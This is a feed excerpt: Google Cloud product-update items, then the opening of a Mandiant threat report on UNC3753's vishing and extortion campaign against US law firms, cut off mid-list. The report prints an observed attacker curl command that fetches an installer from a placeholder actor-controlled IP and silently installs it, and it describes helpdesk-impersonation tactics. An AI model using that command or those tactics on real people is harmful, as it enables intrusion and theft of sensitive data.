&lt;li&gt;&lt;strong&gt;Gemini-powered Assistant in BigQuery Studio Gets Context-Aware Upgrades&lt;br/&gt;&lt;/strong&gt;The Gemini-powered assistant in BigQuery Studio has been transformed into a fully context-aware analytics partner, supporting your entire data lifecycle. The new capabilities include intelligent resource discovery, which uses Dataplex Universal Catalog search to find resources across projects and deep dive into metadata using natural language. You can now automate tasks, such as scheduling production-grade queries directly through the chat interface, and instantly troubleshoot long-running or failed jobs with root cause analysis and cost control auditing.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://docs.cloud.google.com/bigquery/docs/use-cloud-assist"&gt;Explore&lt;/a&gt; the full range of what the assistant can do.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 9 - Mar 13&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;div&gt;&lt;strong&gt;Want to use Gemini to develop code and don't know where to start?&lt;/strong&gt;&lt;br/&gt;This &lt;a href="https://medium.com/google-cloud/supercharge-your-spark-development-with-gemini-1540f1cb47d4" rel="noopener" target="_blank"&gt;article&lt;/a&gt; includes a couple of examples of developing code with Gemini prompts; it identified changes that were needed to be made to get the code working. The article also refers to other examples that are available on github. &lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Mar 2 - Mar 6&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Introducing Gemini 3.1 Flash-Lite, our fastest and most cost-efficient Gemini 3 series model.&lt;/strong&gt; Built for high-volume developer workloads at scale, 3.1 Flash-Lite delivers high quality for its price and model tier. Gemini 3.1 Flash-Lite can tackle tasks at scale, like high-volume translation and content moderation, where cost is a priority. And it can also handle more complex workloads where more in-depth reasoning is needed, like generating user interfaces and dashboards, creating simulations or following instructions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Starting today, 3.1 Flash-Lite is rolling out in preview to enterprises via &lt;/span&gt;&lt;a href="https://console.cloud.google.com/vertex-ai/studio/multimodal?mode=prompt&amp;amp;model=gemini-3.1-flash-lite-preview"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;developers via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-flash-lite-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;div&gt;
&lt;p&gt;&lt;strong&gt;TechTalk: Implementing Device Authorization Grant (RFC 8628) for Apigee&lt;/strong&gt;&lt;br/&gt;Learn how to authorize "headless" devices like Smart TVs or AI agents that lack keyboards and browsers. Join our Community TechTalk on March 19 (5PM CET / 12PM EDT) to go under the hood of Apigee X/Hybrid. We’ll cover the real-world mechanics of state management, polling, and human-in-the-loop security patterns for devices and autonomous agents.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/4r6o6Zi" rel="noopener" target="_blank"&gt;Register for the TechTalk&lt;/a&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Feb 23 - Feb 27&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;strong&gt;Pro-level image generation gets faster and more accessible with Nano Banana 2&lt;br/&gt;&lt;/strong&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Nano Banana 2 is our state-of-the-art image generation and editing model. It delivers Pro-level image generation and editing at the speed you expect from Flash — making the quality, reasoning, and world knowledge you loved about Nano Banana Pro more accessible. Learn more about the model &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/technology/ai/nano-banana-2" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;The Intelligent Path to Compliance: Transforming Regulatory QC with Google Cloud&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Reducing "Refuse to File" (RTF) risks and submission cycle times is critical for life sciences leaders. Google Cloud’s Regulatory Submission Semantic QC Auditor leverages Gemini and RAG architecture to transform Quality Control from a manual burden into an active, intelligent workflow.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By automating semantic cross-referencing, narrative coherence checks, and dynamic guidance-based auditing, this solution ensures rigorous accuracy and auditability. Operating within a secure GxP-ready environment, it empowers teams to detect subtle inconsistencies and generate remediation plans without sacrificing data privacy. &lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://discuss.google.dev/t/the-intelligent-path-to-compliance-transforming-regulatory-quality-control-with-google-cloud/335276" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Stop typing, start interacting! &lt;strong&gt;The Gemini Live Agent Challenge is here&lt;/strong&gt;. Build immersive agents that can help you see, hear, and speak using Gemini and Google Cloud. Compete for your share of $80,000+ in prizes and a trip to Google Cloud Next '26!&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;Submissions are open from February 16, 2026 to March 16, 2026. Learn more and register at &lt;/span&gt;&lt;a href="http://geminiliveagentchallenge.devpost.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;geminiliveagentchallenge.devpost.com&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Feb 9 - Feb 13&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Introducing Gemini 3.1 Pro on Google Cloud. &lt;/span&gt;&lt;/strong&gt;&lt;/p&gt;
&lt;span style="vertical-align: baseline;"&gt;3.1 Pro is a noticeably smarter, more capable baseline for complex problem-solving. We’re shipping 3.1 Pro at scale, building upon our &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/ai-machine-learning/gemini-3-is-available-for-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;goal&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to help you transform your business for the agentic future. Learn more about the model’s capabilities &lt;/span&gt;&lt;a href="https://blog.google/innovation-and-ai/models-and-research/gemini-models/gemini-3-1-pro" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;here&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Gemini 3.1 Pro is available starting today in preview in &lt;/span&gt;&lt;a href="https://cloud.google.com/vertex-ai?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Vertex AI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;a href="https://cloud.google.com/gemini-enterprise?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini Enterprise&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Developers can access the model in preview via the Gemini API in &lt;/span&gt;&lt;a href="https://aistudio.google.com/prompts/new_chat?model=gemini-3.1-pro-preview" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google AI Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://developer.android.com/studio" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Android Studio&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, &lt;/span&gt;&lt;a href="https://antigravity.google/blog/gemini-3-1-in-google-antigravity" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Antigravity&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, and &lt;/span&gt;&lt;a href="https://geminicli.com/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Gemini CLI&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Automate Storage Compatibility with GKE Dynamic Default Storage Classes&lt;br/&gt;&lt;/strong&gt;Managing storage across mixed-generation VM clusters in GKE just got easier. With the new &lt;strong&gt;Dynamic Default Storage Class&lt;/strong&gt;, Google Kubernetes Engine automatically selects between Persistent Disk (PD) and Hyperdisk based on a node's specific hardware compatibility. This abstraction eliminates the need for complex scheduling rules and manual pairing, ensuring your volumes "just work" regardless of the underlying infrastructure. By defining both variants in a single class, you reduce operational overhead while maintaining peak performance and cost-efficiency across your entire cluster.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://docs.cloud.google.com/kubernetes-engine/docs/concepts/hyperdisk#automated_disk_type_selection" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;Explore automated disk type selection&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Community TechTalk: AI-Powered Apigee Development with strofa.io&lt;br/&gt;&lt;/strong&gt;&lt;strong style="vertical-align: baseline;"&gt;Join the Apigee community on February 26&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; for a deep dive into&lt;/span&gt; &lt;a href="https://www.google.com/search?q=http://strofa.io" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;strofa.io&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. Guest speaker Denis Kalitviansky will demonstrate how this new AI-powered tool automates and orchestrates Apigee development, from local emulators to large-scale hybrid environments. Discover how to scale your API management and streamline team collaboration using the latest in AI-driven automation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://goo.gle/3Oerns3" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Register now to reserve your spot.&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Jan 26 - Jan 30&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Simplify API Governance with Native OpenAPI v3 Support&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Eliminate integration debt and accelerate deployment velocity with the General Availability of OpenAPI v3 (OASv3) support for API Gateway and Cloud Endpoints. You no longer need to downgrade modern specifications to OASv2. Instead, you can now define API contracts and enforce critical policies—including telemetry, quotas, and security—using native Google-specific extensions directly within your OASv3 files. This update ensures your APIs are secure by design while remaining fully compatible with the modern developer ecosystem and Google Cloud’s AI services.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/49Wx58Z" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Get started with OpenAPI v3 on API Gateway and Cloud Endpoints.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Accelerate API Testing with the New Open Source API Tester&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Start validating your APIs with API Tester, a simple, YAML-based Test Driven Development (TDD) framework. Designed for the Apigee community, this tool allows you to write human-readable tests, run them instantly via a web client or CLI, and perform deep unit testing on Apigee proxies. With native support for JSONPath assertions and Apigee shared flows, you can verify everything from payload data to internal variables like &lt;code style="vertical-align: baseline;"&gt;proxy.basepath&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; without leaving your terminal.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4q5WDGK" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Explore the API Tester guide and start testing your proxies today.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Secure Sensitive Data with Kubernetes Secrets in Apigee hybrid&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Enhance security in Apigee hybrid by accessing Kubernetes Secrets directly within your API proxies. This hybrid-exclusive feature keeps sensitive credentials within your cluster boundary and prevents replication to the management plane. It supports strict separation of duties: operators manage secrets via &lt;code style="vertical-align: baseline;"&gt;kubectl&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, while developers reference them as secure flow variables—ideal for high-compliance and GitOps workflows.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/4qEVffo" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Implement Kubernetes Secrets in your hybrid proxies.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;See the Console in a Whole New Light: Dark Mode is Now Generally Available in Google Cloud&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Elevate your cloud management workflow with Dark Mode, now generally available in the Google Cloud console. We have delivered a modern, cohesive, and accessible experience reimagined for maximum comfort and productivity—especially during extended working hours and low-light environments. Dark Mode can be enabled automatically based on your operating system's preference, or manually through the Settings  -&amp;gt; Appearance menu.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://docs.cloud.google.com/docs/get-started/console-appearance" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Switch to Dark Mode today to enjoy a modern, comfortable, and productive environment!&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;&lt;span style="vertical-align: baseline;"&gt;Apigee X Networking: PSC or VPC Peering?&lt;br/&gt;&lt;/span&gt;&lt;/strong&gt;Deciding how to connect Apigee X? Watch this video to compare Private Service Connect and VPC Peering. We break down northbound and southbound routing, IP consumption, and how to reach targets on-prem or in the cloud. Learn to simplify your architecture and avoid common networking "gotchas" for a smoother deployment.&lt;br/&gt;&lt;br/&gt;&lt;a href="https://goo.gle/4bWBGdV" rel="noopener" style="font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Watch the video.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'&gt;Jan 19 - Jan 23&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Bridge the Gap: Excel-to-API Conversion in Apigee Portals&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Give your customers more ways to connect! This new article by Tyler Ayers explores how to extend the Apigee Integrated Portal to support direct Excel file uploads. By leveraging SheetJS and custom portal scripts, you can enable users to upload spreadsheets, preview data, and submit it directly to your APIs, all without writing a single line of integration code themselves. It’s a powerful way to simplify onboarding for those who aren't yet API-ready.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://goo.gle/3Nq3Pjo" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn how to build it&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong style="vertical-align: baseline;"&gt;Elevate your applications with Firestore’s new advanced query engine&lt;br/&gt;&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.&lt;br/&gt;&lt;br/&gt;&lt;/span&gt;&lt;a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Learn more about Firestore pipeline operations.&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;</description><pubDate>Fri, 05 Jun 2026 16:00:00 +0000</pubDate><guid>https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/</guid><category>Google Cloud</category><category>Inside Google Cloud</category><media:content height="540" url="https://storage.googleapis.com/gweb-cloudblog-publish/images/whats_new_2026_CfhxFWX.max-600x600.jpg" width="540"></media:content><og xmlns:og="http://ogp.me/ns#"><type>article</type><title>What’s new with Google Cloud</title><description></description><image>https://storage.googleapis.com/gweb-cloudblog-publish/images/whats_new_2026_CfhxFWX.max-600x600.jpg</image><site_name>Google</site_name><url>https://cloud.google.com/blog/topics/inside-google-cloud/whats-new-google-cloud/</url></og><author xmlns:author="http://www.w3.org/2005/Atom"><name>Google Cloud Content &amp; Editorial </name><title></title><department></department><company></company></author></item><item><title>Seeking Counsel: Ongoing Targeted Campaign Against US Law Firms</title><link>https://cloud.google.com/blog/topics/threat-intelligence/targeted-campaign-us-law-firms/</link><description>&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Chad Reams, Tufail Ahmed, Keith Knapp, Ashley Frazer, Tyler McLellan&lt;/p&gt;
&lt;hr/&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;From January through May 2026, Mandiant identified a financially motivated data theft extortion campaign executed by the threat cluster UNC3753 (also tracked as "Luna Moth," “Chatty Spider,” and "Silent Ransom Group") targeting dozens of organizations across professional, legal, and financial services in the United States.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 leverages voice phishing (vishing) and social engineering deception techniques to achieve remote access into corporate environments. Using pretexts such as data migration or invoice related emails, the threat actors initiate phone conversations posing as IT support and convince targets to host screen-sharing sessions and download remote monitoring and management (RMM) utilities. Once inside the environment, the threat actors either directly conduct searches to locate and exfiltrate highly sensitive data, or manipulate the victim into executing these actions on their behalf. This data typically includes proprietary legal agreements, personally identifiable information (PII), and financial records for subsequent extortion demands.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Notably, in instances possibly linked to UNC3753, threat actors have accessed victims' systems in person. &lt;/span&gt;&lt;a href="https://www.ic3.gov/CSA/2026/260526.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;In these physical incidents&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, individuals posing as IT technicians entered corporate offices to attempt direct exfiltration of data from an endpoint using USB storage media. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This blog post details the threat group's technical lifecycle across recent Mandiant Consulting incident response engagements, highlights tactics like physical office targeting, and provides actionable recommendations to safeguard endpoints and infrastructure.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Threat Detail&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The UNC3753 campaign lifecycle reflects an optimized, fast-tempo operational model. In many Mandiant investigated incidents, the entire attack sequence—from initial target contact to data theft and extortion—occurred within a single business day. Recently, Mandiant observed data searches, staging, and theft initiated in under an hour. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The threat group frequently initializes campaigns using benign, invoice-themed email lures sent from actor-controlled consumer email accounts. These messages contain no active links or malicious attachments. Instead, they typically contain a brief, generic message for example: “hello, here is the invcoie we talked about yesterday”. Google Threat Intelligence Group (GTIG) assesses that the primary purpose of these emails is to establish a pretext, raising the target's internal security concerns so they are more susceptible to follow-up voice calls.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "
      &gt;

      
      
        
        &lt;img
            src="https://storage.googleapis.com/gweb-cloudblog-publish/images/seeking-counsel-fig1.max-1000x1000.png"
        
          alt="UNC3753 Attack Lifecycle"&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p data-block-key="x6e79"&gt;Figure 1: UNC3753 attack lifecycle&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Initial Access via IT Helpdesk Impersonation&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The core of UNC3753's entry mechanism relies on targeted vishing. Mandiant has observed the group targeting personnel across all seniority levels, who are often publicly listed on the organization’s websites, to harvest phone numbers and email addresses. Acting as members of the organization's internal IT helpdesk or security team, threat actors place direct calls to these employees. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The callers use a variety of verbal instructions to guide target behavior. Under the guise of addressing a security issue or aiding with a corporate data migration project, they build trust and direct the target to join a screen-sharing session.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Remote Screen Control and Legitimate Tool Abuse&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once the target is engaged, the threat actors bypass conventional automated boundary security and email filtering controls by instructing the user to download and execute screen-sharing applications. &lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Screen-Sharing Utilities&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 instructs targets to initiate remote desktop and support sessions using built-in or commercial services, including Zoom, Microsoft Terminal Services, Microsoft Teams, and Quick Assist. During a Teams-facilitated intrusion, the threat actor held five distinct calls with the same target over a three-day period.&lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Commercial RMM Agents&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 frequently attempts to establish more persistent access by social engineering targets into downloading AnyDesk, Bomgar, or Zoho Assist installers. In one engagement, the threat actor attempted to install a "SuperOps RMM agent" by convincing the target to download and execute a payload via a cURL command.&lt;/span&gt;&lt;/p&gt;
&lt;h5&gt;&lt;span style="vertical-align: baseline;"&gt;Message Delivery via Privnote&lt;/span&gt;&lt;/h5&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Threat actors consistently utilize &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;privnote[.]com,&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; a web-based, self-destructing text utility, to transmit installation links and commands to targets. This evasion technique ensures that copy-paste vectors leave no permanent footprint on endpoint browsers or chat logs.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Example cURL command staging string observed in UNC3753 remote sessions:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" &amp;amp;&amp;amp; msiexec /i "SuperOps.msi" /quiet&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Infrastructure Pivoting and Local Staging&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Intrusions have abused Bring Your Own Device (BYOD) remote environments to access internal enterprise assets. In separate Mandiant Consulting cases, UNC3753 established Zoom sessions directly on targets' personal BYOD endpoints. Using these compromised personal laptops, they accessed corporate virtual desktop infrastructure (VDI) using native client platforms, such as Windows 365 (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;Windows365.exe&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) or Citrix clients. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once VDI environment access is secured, the threat actors pivot to corporate file systems:&lt;/span&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;System Enumeration: The threat actors map local directories, enumerate active OneDrive folders, and crawl mapped network drives.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Document Management Targeted Harvesting: Threat actors target specific legal and document storage repositories.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"&gt;
&lt;p role="presentation"&gt;&lt;span style="vertical-align: baseline;"&gt;Keyword Search and File Staging: Threat actors use specific keyword search functions within iManage to locate highly sensitive folders containing tax logs (Forms W-2, W-9, and 1099), audit files, corporate client agreements, and Social Security numbers (SSNs). Staged results are compiled and sorted within target-accessible subdirectories, primarily inside the user's Downloads folder or native Roaming profile path.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Data Theft&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;UNC3753 exfiltrates the staged data using a variety of methods to bypass security controls. They frequently use portable versions of WinSCP or Rclone. In other instances, they simply log into a threat actor-controlled consumer file sharing account directly within the victim's web browser and batch upload the stolen files.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li aria-level="1" style="list-style-type: disc; vertical-align: baseline;"&gt;
